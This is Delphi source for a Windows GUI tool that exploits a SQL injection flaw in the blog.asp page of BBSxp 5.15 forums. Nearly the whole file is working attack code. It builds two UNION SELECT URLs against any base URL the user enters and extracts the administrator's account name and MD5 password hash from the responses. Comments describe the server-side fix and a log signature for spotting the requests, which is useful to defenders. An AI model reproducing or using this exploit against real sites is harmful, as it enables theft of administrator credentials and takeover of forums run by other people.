unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, StdCtrls, IdAntiFreezeBase, IdAntiFreeze, WinHTTP, ComCtrls, ExtCtrls, WinSkinData;
{ Main form of a single-window client for a SQL injection flaw in the
  blog.asp page of BBSxp 5.15 (the version named in the window caption).
  Roles of the controls, as used by the handlers in this unit:
    Edit1     - base URL of the forum; 'blog.asp?id=...' is appended to it.
    Edit2     - receives the account name parsed from the first response.
    Edit3     - receives the 32-character value parsed from the second response.
    IdHTTP1   - performs the first (blocking) GET.
    WinHTTP1  - performs the second request; its result arrives through the
                WinHTTP1Done / WinHTTP1HTTPError events.
    Button1   - starts the two requests; Button2 closes the form. }
type
  TForm1 = class(TForm)
    Edit1: TEdit;
    Edit2: TEdit;
    Edit3: TEdit;
    Button1: TButton;
    IdHTTP1: TIdHTTP;
    WinHTTP1: TWinHTTP;
    Label1: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    Bevel1: TBevel;
    Button2: TButton;
    StatusBar1: TStatusBar;
    procedure Button1Click(Sender: TObject);
    procedure WinHTTP1Done(Sender: TObject; const ContentType: String; FileSize: Integer; Stream: TStream);
    procedure WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer; Stream: TStream);
    procedure Button2Click(Sender: TObject);
    procedure Edit3Change(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
var Form1: TForm1;
implementation
{ $R *.dfm }
{ Button1 handler: sends two UNION-based SQL injection requests to blog.asp.

  Both URLs put a "union select top 1 ..." clause into the numeric `id`
  query parameter, reading [username] and then [userpass] from the [user]
  table for the row with membercode=5 (presumably the administrator role;
  not confirmed by this file). The requests only return data if the server
  concatenates `id` into its SQL text unvalidated. The server-side fix is to
  accept `id` only as an integer and bind it as a query parameter.

  Detection: these requests stand out in web server logs as GETs for
  blog.asp whose `id` value contains "union", "select" and "[user]".

  Flow: the first request is a blocking IdHTTP GET whose body is parsed
  here. The second is started through WinHTTP1 and parsed in
  WinHTTP1Done / WinHTTP1HTTPError. }
procedure TForm1.Button1Click(Sender: TObject);
var
  s1:string;
  url1,url2:string;
  i:integer;
begin
  // Nothing to do without a base URL (the message asks for one first).
  if edit1.Text ='' then
  begin
    showmessage(' 请输入网址先!');
    exit;
  end;
  // Edit1 is used as a raw prefix: no trailing-slash or scheme check is made.
  url1:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
  url2:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
  //--------------------------- account name (idHTTP) -----------------------
  try
    Form1.Caption :='正在暴取账号......';
    s1:=idHTTP1.Get(url1);
    if pos('username',s1)<>0 then
    begin
      i:=pos('username',s1);
      // Skip the 8-character marker plus one more character, then take a
      // 15-character window. Original note: the account length is not
      // fixed, but it is at most 12 characters.
      s1:=copy(s1,i+9,15);
      // The value ends at the first '">' inside that window. If '">' is
      // absent, i is 0 and the copy below yields an empty string.
      i:=pos('">',s1);
      s1:=copy(s1,1,i-1); // the account name
      edit2.Text :=s1;
      idHTTP1.Disconnect ; // close the connection
    end
    else
    begin
      // Marker not found: restore the caption, report that the target is
      // probably not affected, and stop before the second request.
      Form1.Caption :='[BBSxp 5.15]暴库工具 ';
      showmessage('暴库失败!可能不存在此漏洞!');
      idHTTP1.Disconnect ; // close the connection
      exit;
    end;
  except
    // Any exception from the GET or the parsing (the message says
    // "network timeout or other error") ends the handler.
    Form1.Caption :='[BBSxp 5.15]暴库工具 ';
    showmessage('网络超时或其他错误!');
    idHTTP1.Disconnect ;
    exit; // on error, leave without running the code below
  end;
  //---------- account name done -------------
  //---- original author's assumption: if the account request worked, the
  //---- password request will too, so carry on
  //----------------------------- password (WinHTTP) ------------------------
  Form1.Caption :='正在暴取密码......';
  WinHTTP1.URL :=url2;
  WinHTTP1.Read;
  //----- continues in WinHTTP1Done and WinHTTP1HTTPError ----------
end;
// WinHTTP1Done and WinHTTP1HTTPError must stay identical: per the original
// author, the response carrying the password value usually arrives in the
// Error state. That suggests the server answers this request with an error
// page that still reflects database content.
{ Success-path handler for the second request started in Button1Click.
  Copies the response stream into a string, looks for the 'username'
  marker and, if found, shows the 32 characters after it in Edit3.
  ContentType and FileSize are not used. }
procedure TForm1.WinHTTP1Done(Sender: TObject; const ContentType: String; FileSize: Integer; Stream: TStream);
var
  body: string;
  markerPos: Integer;
  mem: TMemoryStream;
begin
  // The `as` cast raises if the component hands over anything other than
  // a TMemoryStream.
  mem := Stream as TMemoryStream;
  SetLength(body, mem.Size);
  Stream.Read(body[1], mem.Size);

  markerPos := Pos('username', body);
  if markerPos = 0 then
    Exit;

  // Skip the 8-character marker plus one more character. Per the original
  // author the value is a fixed-length 32-character MD5 digest, so a fixed
  // window is enough. A plain MD5 digest is not an adequate password store
  // once it leaves the database.
  edit3.Text := Copy(body, markerPos + 9, 32);
end;
{ Error-path handler for the second request started in Button1Click.
  Runs the same extraction as WinHTTP1Done, because the original author
  notes that the wanted response usually comes back as an HTTP error.
  ErrorCode is not inspected. }
procedure TForm1.WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer; Stream: TStream);
var
  body: string;
  markerPos: Integer;
  mem: TMemoryStream;
begin
  // The `as` cast raises if the stream is not a TMemoryStream.
  mem := Stream as TMemoryStream;
  SetLength(body, mem.Size);
  Stream.Read(body[1], mem.Size);

  markerPos := Pos('username', body);
  if markerPos = 0 then
    Exit;

  // Fixed 32-character window after the marker and one following
  // character. Per the original author this is the MD5 digest of the
  // password.
  edit3.Text := Copy(body, markerPos + 9, 32);
end;
{ Button2 handler: closes the form. }
procedure TForm1.Button2Click(Sender: TObject);
begin
  Self.Close;
end;
{ Edit3 change handler: once the second response has filled Edit3 (or the
  user edits it), put the idle window title back in place of the
  "in progress" caption set by Button1Click. }
procedure TForm1.Edit3Change(Sender: TObject);
begin
  Form1.Caption := '[BBSxp 5.15]暴库工具 ';
end;
end.

OVER